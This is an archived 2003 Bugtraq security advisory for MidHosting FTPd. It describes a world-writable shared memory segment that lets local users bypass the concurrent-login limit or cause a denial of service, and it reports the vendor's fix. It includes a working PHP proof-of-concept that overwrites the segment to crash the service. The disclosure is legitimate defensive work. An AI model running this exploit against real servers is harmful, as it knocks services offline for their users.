Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

MHFTPD vulnerability

From: Frank Denis <j () 42-networks com>
Date: Wed, 18 Jun 2003 10:18:13 +0200

Product : MidHosting FTPd
Date    : 06/18/2003
Author  : Frank Denis <j () 42-networks com>



   ------------------------[ Product description ]------------------------

MidHosting FTPd is an FTP server designed for hosting servers, based upon
virtual ftpd with support for chroot, virtual users and other standard FTP
features.

Home page : http://freeware.tversu.ru/mhftpd/


      ------------------------[ Vulnerability ]------------------------
     
mhftpd can keep track of logged users in order to disable multiple
concurrent logins. The -m command-line switch enables this option.

Unfortunately, when this option is enabled, any user with shell access, CGI
access, PHP access, etc. can bypass this restriction or cause a permanent
denial of service.


         ------------------------[ Details ]------------------------

The list of currently logged users is kept in a public SysV shared memory
segment.

However this segment and the related locking semaphore are world readable
and world writable.

Non null-terminated user names will immediately cause a denial of service.


         ------------------------[ Exploit ]------------------------

Here's a trivial PHP script that triggers the flaw and makes the service
unavailable.

<?php
# mhftpd denial of service

define('SHMSIZE', 16384);

if (($shmid = shmop_open(ftok('/tmp', 'U'), 'w', 0777, SHMSIZE)) == -1) {
    die();
}
shmop_write($shmid, str_repeat('A', SHMSIZE), 0);

?>


    ------------------------[ Affected versions ]------------------------
     
  This issue has been verified on version 1.0.1 of MidHosting FTPd.
  

 ------------------------[ Vendor status and fixes ]------------------------
     
  MidHosting FTPd author Ivan Stepnikov <iv () tversu ru> has been notified on
06/17/2003 and promptly fixed the permissions on the shared memory segment.

  The fixed version is available for download from the main web site.
  
  However it looks like the version number hasn't been bumped. In order to
check whether your software is vulnerable or not, please compute the MD5
digest of the tarball. The digest of the fixed one is
9b0bb31948ebbb11e9d2ef74276310df.
Previous By Date Next
Previous By Thread Next

Current thread: